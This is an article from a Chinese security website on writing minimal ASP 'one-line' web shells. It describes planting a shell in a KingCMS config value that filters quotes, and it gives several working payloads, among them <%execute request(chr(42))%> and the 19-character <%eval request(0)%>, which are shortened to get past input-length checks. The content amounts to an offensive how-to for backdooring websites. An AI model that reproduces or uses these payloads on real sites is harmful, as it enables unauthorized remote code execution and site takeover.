频道栏目
首页 > 安全 > 网站安全 > 正文

asp一句话的一些tips

2008-10-30 00:15:03           
收藏   我要投稿
文章作者:落叶纷飞[J.L.S.T]
信息来源:安全叶子技术小组[J.Leaves Security Team](http://00day.cn


关于一句话的tips可能各位在网上看的多了,什么变形,变两句话,变三句话,变四句话.............吃多了........

一句话的字符数一般最少为24个字节,其实可以更少,有时我们在插马的时候可能会遇到过滤了“”和“"”等字符,还可能有字符限制,这里我就和大家一起YY一下~~

上次别人问的kingcms拿shell方法就涉及到了“绕”的东西,具体讨论贴在:http://00day.cn/forum/read.php?tid=892

有兴趣的可以去看看,这个系统主要是过滤了单引号和双引号,我们来看一段他要插入的文件的部分:

.............................................
top="安全叶子技术小组"
timeout=3000
.............................................

如果我们要从top项目哪里绕,显然是非常困难的,因为程序过滤了单引号和双引号,一般一句话木马是这样写的“<%execute request("l")%>”.

这样显然是执行不了的,就算能执行,要闭合掉前面的“"”也是一件令人费解的事情

所以我们只能把希望寄托给timeout,因为这个项目不需要我们去想闭合的事情,聪明的朋友应该会想到这样来插马“<%execute request(chr(42))%>”

但是如果程序有字符数限制呢?我们只能尽可能的减少字符,很多朋友会认为“<%execute request(chr(42))%>”这样已经是最精简的了,其实不然

我们可以这样写“<%execute(request(0))%>”,连接密码为“0”

怎么?还不够少?还可以这样写“<%eval request(0)%>”仅仅为19个字符,一般程序编写的限制都为20个字符,这样的形式就能绕过其验证了

“<%eval request(0)%>”这种形式还能绕过一其他的一些验证,具体就要看情况了。
相关TAG标签 一句话
上一篇:Discuz! [flash] xss bug
下一篇:sa执行命令方法总结
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站